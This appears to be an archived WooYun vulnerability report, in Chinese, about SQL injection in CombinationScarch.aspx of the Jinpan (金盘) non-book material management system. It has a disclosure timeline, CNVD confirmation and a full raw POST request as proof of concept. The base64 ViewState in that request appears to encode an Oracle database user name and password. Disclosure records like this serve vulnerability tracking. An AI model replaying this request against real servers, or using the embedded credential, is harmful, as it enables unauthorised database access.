乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-18: 细节已通知厂商并且等待厂商处理中 2015-07-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-07-24: 细节向第三方安全合作伙伴开放 2015-09-14: 细节向核心白帽子及相关领域专家公开 2015-09-24: 细节向普通白帽子公开 2015-10-04: 细节向实习白帽子公开 2015-10-19: 细节向公众公开
某通用型资料管理系统存在SQL注射漏洞
系统同:http://**.**.**.**/bugs/wooyun-2010-062061 1.厂商和系统: 金盘鹏图软件技术有限公司 金盘非书资料管理系统 2.漏洞文件: CombinationScarch.aspx3.案例: http://**.**.**.**/fsweb/ **.**.**.**:22/fsweb/ **.**.**.**/fsweb/ http://**.**.**.**/gdlibweb/ **.**.**.**:83/数据包:
POST /fsweb/CombinationScarch.aspx HTTP/1.1Cache-Control: no-cacheReferer: **.**.**.**/fsweb/CombinationScarch.aspxAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36Accept-Language: en-us,en;q=0.5Host: **.**.**.**Cookie: ASP.NET_SessionId=45dr5kqlph3pul2qwbvrii55; CheckCode=L0K66IAccept-Encoding: gzip, deflateContent-Length: 9549Content-Type: application/x-www-form-urlencoded__EVENTTARGET=3&__EVENTARGUMENT=3&__LASTFOCUS=3&__VIEWSTATE=%2fwEPDwULLTIwNjM5NjA1NTAPZBYCAgMPZBYGAgEPZBYIAgEPFgIeCWlubmVyaHRtbAWIAQ0KICAgIDxwIGNsYXNzPSJ0b3BUeHQiPjxzcGFuIGNsYXNzPSJ5ZWxsb3ciPuWFrOWRijo8L3NwYW4%2bIOi%2fmemHjOaUvuermeeCueWFrOWRiiA8c3BhbiBjbGFzcz0icmVkIj7mn6XnnIs8L3NwYW4%2bIOeCueWHu%2bi%2fmemHjDwvcD4NCiAgICBkAgMPFgIeB1Zpc2libGVoZAIFDxYCHwAFiwI8bGk%2bPGEgaHJlZj0iRGVmYXVsdC5hc3B4Ij7kuLvpobU8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iQmFzZVNjYXJjaC5hc3B4IiBjbGFzcz0iaG92ZXIiPuaVsOaNruafpeivojwvYT48L2xpPjxsaT48YSBocmVmPSJSZWFkZXJUYWJsZS5hc3B4Ij7or7vogIXnrqHnkIY8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iSG90QnJvd3NlLmFzcHgiPueDremXqOS5puWIijwvYT48L2xpPjxsaT48YSBocmVmPSJTcGVha0ludGVydFNjYXJjaC5hc3B4Ij7lm77kuablvoHorqI8L2E%2bPC9saT5kAgcPFgIfAAWgATxsaT48YSBocmVmPSJCYXNlU2NhcmNoLmFzcHgiPueugOWNleafpeivojwvYT48L2xpPjxsaT48YSBocmVmPSJDb21iaW5hdGlvblNjYXJjaC5hc3B4Ij7nu4TlkIjmn6Xor6I8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iU29ydFNjYXJjaC5hc3B4Ij7liIbnsbvmn6Xor6I8L2E%2bPC9saT5kAgMPZBYIAgEPZBYGAgEPFgIfAWhkAgUPFgIeCW9ua2V5ZG93bgUPVWVyc0tleUNsaWNrKCk7ZAIHDxYCHwIFIkVudGVyS2V5Q2xpY2soJ0xlZnRNdW4xX0J1dHRvbjInKTtkAgMPFgIfAWhkAgcPFgIfAAXRCTxsaT48YSBocmVmPSJNYWtlSW50ZXJ0LmFzcHg%2fSUQ9MTIzIj48c3BhbiBjbGFzcz0ibm9yIj4gICA8L3NwYW4%2bPHNwYW4gY2xhc3M9ImJnIj4wMTwvc3Bhbj7jgIrlj43mnZzmnpforrrjgIvkuK3nmoTmlL%2fmsrvnu4%2fmtY7lraY8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iTWFrZUludGVydC5hc3B4P0lEPTExNDcxIj48c3BhbiBjbGFzcz0ibm9yIj4gICA8L3NwYW4%2bPHNwYW4gY2xhc3M9ImJnIj4wMjwvc3Bhbj7lpofnp5HpmLTpg6jmiYvmnK%2flm77op6M8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iTWFrZUludGVydC5hc3B4P0lEPTIyMjk3Ij48c3BhbiBjbGFzcz0ibm9yIj4gICA8L3NwYW4%2bPHNwYW4gY2xhc3M9ImJnIj4wMzwvc3Bhbj7pvp%2fom4fmsJTlip88L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iTWFrZUludGVydC5hc3B4P0lEPTM4MDkzIj48c3BhbiBjbGFzcz0ibm9yIj4gICA8L3NwYW4%2bPHNwYW4gY2xhc3M9ImJnIj4wNDwvc3Bhbj7lpbPnlJ%2fnp4HmiL%2for5065aWz5a2p55qE5oCn55%2bl6K%2bGPC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ik1ha2VJbnRlcnQuYXNweD9JRD02OCI%2bPHNwYW4gY2xhc3M9Im5vciI%2bICAgPC9zcGFuPjxzcGFuIGNsYXNzPSJiZyI%2bMDU8L3NwYW4%2b5YiX5a6B55qE5pyA5ZCO5paX5LqJPC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ik1ha2VJbnRlcnQuYXNweD9JRD03MzcxMjQiPjxzcGFuIGNsYXNzPSJub3IiPiAgIDwvc3Bhbj48c3BhbiBjbGFzcz0iYmciPjA2PC9zcGFuPuacsemVleWfuuetlOiusOiAhemXrjwvYT48L2xpPjxsaT48YSBocmVmPSJNYWtlSW50ZXJ0LmFzcHg%2fSUQ9MTIwIj48c3BhbiBjbGFzcz0ibm9yIj4gICA8L3NwYW4%2bPHNwYW4gY2xhc3M9ImJnIj4wNzwvc3Bhbj7jgIroh6rnhLbovqnor4Hms5XjgIvop6Por7Q8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iTWFrZUludGVydC5hc3B4P0lEPTcwNDgyNyI%2bPHNwYW4gY2xhc3M9Im5vciI%2bICAgPC9zcGFuPjxzcGFuIGNsYXNzPSJiZyI%2bMDg8L3NwYW4%2b5peg6aKG5Yiw55m96aKGPC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ik1ha2VJbnRlcnQuYXNweD9JRD0zNTA1MyI%2bPHNwYW4gY2xhc3M9Im5vciI%2bICAgPC9zcGFuPjxzcGFuIGNsYXNzPSJiZyI%2bMDk8L3NwYW4%2b576O5Zu95LmL5peFPC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ik1ha2VJbnRlcnQuYXNweD9JRD03MzcxNTUiPjxzcGFuIGNsYXNzPSJub3IiPiAgIDwvc3Bhbj48c3BhbiBjbGFzcz0iYmciPjEwPC9zcGFuPue%2bjuS6uuS9leWkhDwvYT48L2xpPmQCCQ8WAh8ABe8JPGxpPjxhIGhyZWY9Ik1ha2VJbnRlcnQuYXNweD9JRD03MDQ4MjciPjxzcGFuIGNsYXNzPSJub3IiPiAgIDwvc3Bhbj48c3BhbiBjbGFzcz0iYmciPjAxPC9zcGFuPuaXoOmihuWIsOeZvemihjwvYT48L2xpPjxsaT48YSBocmVmPSJNYWtlSW50ZXJ0LmFzcHg%2fSUQ9NzI4MDc3Ij48c3BhbiBjbGFzcz0ibm9yIj4gICA8L3NwYW4%2bPHNwYW4gY2xhc3M9ImJnIj4wMjwvc3Bhbj7ljLrln5%2fliJvmlrDmoIfmnYY8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iTWFrZUludGVydC5hc3B4P0lEPTcxODE0MiI%2bPHNwYW4gY2xhc3M9Im5vciI%2bICAgPC9zcGFuPjxzcGFuIGNsYXNzPSJiZyI%2bMDM8L3NwYW4%2b5Y2O5YyX54Wk55Sw5bKp5rq26Zm36JC95p%2bx5Y%2bK5YW256qB5rC056CU56m2PC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ik1ha2VJbnRlcnQuYXNweD9JRD02Mjk1OTMiPjxzcGFuIGNsYXNzPSJub3IiPiAgIDwvc3Bhbj48c3BhbiBjbGFzcz0iYmciPjA0PC9zcGFuPuefv%2bWxseawtOWus%2bmYsuayu%2beQhuiuuuS4juaWueazlTwvYT48L2xpPjxsaT48YSBocmVmPSJNYWtlSW50ZXJ0LmFzcHg%2fSUQ9NTA2OTYiPjxzcGFuIGNsYXNzPSJub3IiPiAgIDwvc3Bhbj48c3BhbiBjbGFzcz0iYmciPjA1PC9zcGFuPuWfuuS4mumVv%2bmdkjwvYT48L2xpPjxsaT48YSBocmVmPSJNYWtlSW50ZXJ0LmFzcHg%2fSUQ9NzM3MTI0Ij48c3BhbiBjbGFzcz0ibm9yIj4gICA8L3NwYW4%2bPHNwYW4gY2xhc3M9ImJnIj4wNjwvc3Bhbj7mnLHplZXln7rnrZTorrDogIXpl648L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iTWFrZUludGVydC5hc3B4P0lEPTczNzE1NSI%2bPHNwYW4gY2xhc3M9Im5vciI%2bICAgPC9zcGFuPjxzcGFuIGNsYXNzPSJiZyI%2bMDc8L3NwYW4%2b576O5Lq65L2V5aSEPC9hPjwvbGk%2bPGxpPjxhIGhyZWY9Ik1ha2VJbnRlcnQuYXNweD9JRD03MzM0NjIiPjxzcGFuIGNsYXNzPSJub3IiPiAgIDwvc3Bhbj48c3BhbiBjbGFzcz0iYmciPjA4PC9zcGFuPuW%2bruingue7j%2ba1juWtpjwvYT48L2xpPjxsaT48YSBocmVmPSJNYWtlSW50ZXJ0LmFzcHg%2fSUQ9MTI1MDIiPjxzcGFuIGNsYXNzPSJub3IiPiAgIDwvc3Bhbj48c3BhbiBjbGFzcz0iYmciPjA5PC9zcGFuPuW3peenkeeglOeptueUn%2bivlemimOS4juino%2betlCDmnZDmlpnlipvlraY8L2E%2bPC9saT48bGk%2bPGEgaHJlZj0iTWFrZUludGVydC5hc3B4P0lEPTYwNjI3MCI%2bPHNwYW4gY2xhc3M9Im5vciI%2bICAgPC9zcGFuPjxzcGFuIGNsYXNzPSJiZyI%2bMTA8L3NwYW4%2b5ZSQ6K%2bX5a6L6K%2bN5Y2B5LqU6K6yPC9hPjwvbGk%2bZAIFDw8WBB4GQnRuQ3NzBQZzdWJidG4eBk9sZUNvbgVsUHJvdmlkZXI9T3JhT0xFREIuT3JhY2xlLjE7UGFzc3dvcmQ9Z2QxMW5ldDtQZXJzaXN0IFNlY3VyaXR5IEluZm89VHJ1ZTtVc2VyIElEPWdkbGlzbmV0O0RhdGEgU291cmNlPWdkbGlzbmV0ZBYMAgcPEA8WBh4NRGF0YVRleHRGaWVsZAUM5a2X5q615ZCN56ewHg5EYXRhVmFsdWVGaWVsZAUJ5omA5bGe6KGoHgtfIURhdGFCb3VuZGdkEBUOD%2baAu%2baLrOeZu%2biusOWPtwnorqLljZXlj7cG6aKY5ZCNCei0o%2bS7u%2biAhQnkuLvpopjor40M5qCH5YeG57yW56CBCeaWh%2beMruWQjQzpopjlkI3nvKnlhpkM6aaG6JeP5Zyw5Z2ACee0ouS5puWPtwnlh7rniYjogIUG6K%2bt56eNBumZhOS7tgzmoIflh4bnvJbnoIEVDgnph4fotK3lupMJ6YeH6LSt5bqTD%2bmmhuiXj%2bS5puebruW6kxLmo4DntKLotKPku7vogIXlupMS5qOA57Si5Li76aKY6K%2bN5bqTD%2bajgOe0oue8lueggeW6kxLmo4DntKLkuIDlr7nlpJrlupMP6aaG6JeP5Lmm55uu5bqTD%2bmmhuiXj%2bWFuOiXj%2bW6kw%2fppobol4%2fkuabnm67lupMP6aaG6JeP5Lmm55uu5bqTD%2bmmhuiXj%2bS5puebruW6kxLmo4DntKLkuIDlr7nlpJrlupMP6aaG6JeP5Lmm55uu5bqTFCsDDmdnZ2dnZ2dnZ2dnZ2dnZGQCCw8QDxYGHwUFDOWtl%2bauteWQjeensB8GBQnmiYDlsZ7ooagfB2dkEBUOD%2baAu%2baLrOeZu%2biusOWPtwnorqLljZXlj7cG6aKY5ZCNCei0o%2bS7u%2biAhQnkuLvpopjor40M5qCH5YeG57yW56CBCeaWh%2beMruWQjQzpopjlkI3nvKnlhpkM6aaG6JeP5Zyw5Z2ACee0ouS5puWPtwnlh7rniYjogIUG6K%2bt56eNBumZhOS7tgzmoIflh4bnvJbnoIEVDgnph4fotK3lupMJ6YeH6LSt5bqTD%2bmmhuiXj%2bS5puebruW6kxLmo4DntKLotKPku7vogIXlupMS5qOA57Si5Li76aKY6K%2bN5bqTD%2bajgOe0oue8lueggeW6kxLmo4DntKLkuIDlr7nlpJrlupMP6aaG6JeP5Lmm55uu5bqTD%2bmmhuiXj%2bWFuOiXj%2bW6kw%2fppobol4%2fkuabnm67lupMP6aaG6JeP5Lmm55uu5bqTD%2bmmhuiXj%2bS5puebruW6kxLmo4DntKLkuIDlr7nlpJrlupMP6aaG6JeP5Lmm55uu5bqTFCsDDmdnZ2dnZ2dnZ2dnZ2dnZGQCDw8QDxYGHwUFDOWtl%2bauteWQjeensB8GBQnmiYDlsZ7ooagfB2dkEBUOD%2baAu%2baLrOeZu%2biusOWPtwnorqLljZXlj7cG6aKY5ZCNCei0o%2bS7u%2biAhQnkuLvpopjor40M5qCH5YeG57yW56CBCeaWh%2beMruWQjQzpopjlkI3nvKnlhpkM6aaG6JeP5Zyw5Z2ACee0ouS5puWPtwnlh7rniYjogIUG6K%2bt56eNBumZhOS7tgzmoIflh4bnvJbnoIEVDgnph4fotK3lupMJ6YeH6LSt5bqTD%2bmmhuiXj%2bS5puebruW6kxLmo4DntKLotKPku7vogIXlupMS5qOA57Si5Li76aKY6K%2bN5bqTD%2bajgOe0oue8lueggeW6kxLmo4DntKLkuIDlr7nlpJrlupMP6aaG6JeP5Lmm55uu5bqTD%2bmmhuiXj%2bWFuOiXj%2bW6kw%2fppobol4%2fkuabnm67lupMP6aaG6JeP5Lmm55uu5bqTD%2bmmhuiXj%2bS5puebruW6kxLmo4DntKLkuIDlr7nlpJrlupMP6aaG6JeP5Lmm55uu5bqTFCsDDmdnZ2dnZ2dnZ2dnZ2dnZGQCEg8QDxYGHwUFDOS5puebruW6k%2bWQjR8GBQnlupPplK7noIEfB2dkEBUGDOS4reaWh%2bWbvuS5pgzlpJbmloflm77kuaYM5Lit5paH5pyf5YiKDOWkluaWh%2bacn%2bWIihLkuK3mlofop4blkKzotYTmlpkS6KW%2f5paH6KeG5ZCs6LWE5paZFQYBMQEyATMBNAE1ATYUKwMGZ2dnZ2dnFgFmZAIVDw8WBh4EVGV4dAUI5qOAICDntKIeCENzc0NsYXNzBQZzdWJidG4eBF8hU0ICAmRkAhYPEA8WBh8FBQnljZXkvY3lkI0fBgUJ6aaG6ZSu56CBHwdnZBAVAQnlm77kuabppoYVAQExFCsDAWdkZGRew7XpzkmbhmW8mot2nly7hNI6cA%3d%3d&__EVENTVALIDATION=%2fwEWWwLUj6nKAQKQqZmoDgKhys%2fcBQLq67C%2fBALfrdrJDwLq2OeKCgL7rqy9DAKqh6beAgLgmKDWBALFr4LBCgKqxuQrAoaa6ecCAoaardYIAoaawbEBAp2dlpAGAp2dlpAGAoDTyocLAqDO%2btgIAuC%2b3agOAtGFvc0CAsTYtfAPAoDTyocLArbVn7cFAoDTyocLAoDTyocLAoDTyocLAsTYtfAPAoDTyocLAoGT1sMDAqH9yfcHAoGk%2ffEMAsCw%2ffEMApGd%2fecKAsGL5fELAqHjqYEOApKdlpAGApKdlpAGAo%2fTyocLAq%2fO%2btgIAu%2b%2b3agOAt6Fvc0CAsvYtfAPAo%2fTyocLArnVn7cFAo%2fTyocLAo%2fTyocLAo%2fTyocLAsvYtfAPAo%2fTyocLAoGT4sMDAqH95VoCgaTR3AsCwLDR3AsCkZ3Ryg0CwYvp8QsCoeOlgQ4Ck52WkAYCk52WkAYCjtPKhwsCrs762AgC7r7dqA4C34W9zQICyti18A8CjtPKhwsCuNWftwUCjtPKhwsCjtPKhwsCjtPKhwsCyti18A8CjtPKhwsCiu2irwkCof3xvQgCgaTFuwMCwLDFuwMCkZ3FrQUCpZTxlw8Cqvvb%2bQMCq%2fvb%2bQMCqPvb%2bQMCqfvb%2bQMCrvvb%2bQMCr%2fvb%2bQMC%2fJenvQ8CiIDImwMC3vDxhAcC15aL8QECndGTmg4Ch%2buOmg4C1LDDwQ0C3onc2wwCiu2OVK6yWdvLyxuiVv5qTWoBnlkGsSvQ&LeftMun1%24RadioButtonList1=BARCODE&LeftMun1%24name=Smith&LeftMun1%24password=3&LeftMun1%24Button2=%e7%99%bb%e5%bd%95&LeftMun1%24usercode=3&GoldCombinationScarch1%24hidtext1=1&GoldCombinationScarch1%24hidtext2=%e8%ae%a2%e5%8d%95%e5%8f%b7&GoldCombinationScarch1%24hidtext3=%e9%a2%98%e5%90%8d&GoldCombinationScarch1%24hidValue1=%e9%87%87%e8%b4%ad%e5%ba%93&GoldCombinationScarch1%24hidValue2=%e9%87%87%e8%b4%ad%e5%ba%93&GoldCombinationScarch1%24hidValue3=%e9%a6%86%e8%97%8f%e4%b9%a6%e7%9b%ae%e5%ba%93&GoldCombinationScarch1%24TxtKay1=3&GoldCombinationScarch1%24TxtKay2=3&GoldCombinationScarch1%24ctl01=3&GoldCombinationScarch1%24SortLX=%e5%8d%87%e5%ba%8f%e6%8e%92%e5%88%97&GoldCombinationScarch1%24ctl02=%e6%a3%80++%e7%b4%a2&GoldCombinationScarch1%24ScarchKay1=%e9%87%87%e8%b4%ad%e5%ba%93&GoldCombinationScarch1%24Drop1=%e4%b8%ad%e9%97%b4%e4%b8%80%e8%87%b4&GoldCombinationScarch1%24DropTj1=%e5%b9%b6%e4%b8%94&GoldCombinationScarch1%24ScarchKay2=%e9%87%87%e8%b4%ad%e5%ba%93&GoldCombinationScarch1%24Drop2=%e4%b8%ad%e9%97%b4%e4%b8%80%e8%87%b4&GoldCombinationScarch1%24DropTj2=%e5%b9%b6%e4%b8%94&GoldCombinationScarch1%24ScarchKay3=%e9%a6%86%e8%97%8f%e4%b9%a6%e7%9b%ae%e5%ba%93&GoldCombinationScarch1%24Drop3=%e4%b8%ad%e9%97%b4%e4%b8%80%e8%87%b4&GoldCombinationScarch1%24ScarchType=1&GoldCombinationScarch1%24SortType=%e5%85%a5%e8%97%8f%e6%97%a5%e6%9c%9f&GoldCombinationScarch1%24CbbLibList=1
危害等级:高
漏洞Rank:15
确认时间:2015-07-21 08:30
CNVD确认并复现所述情况,已经由CNVD通过以往建立的联系渠道向软件生产厂商金盘鹏图软件公司通报(历史上通报过十余起)。目前,软件生产厂商对所通报漏洞均为无回应。该软件同类风险存在多起。
暂无
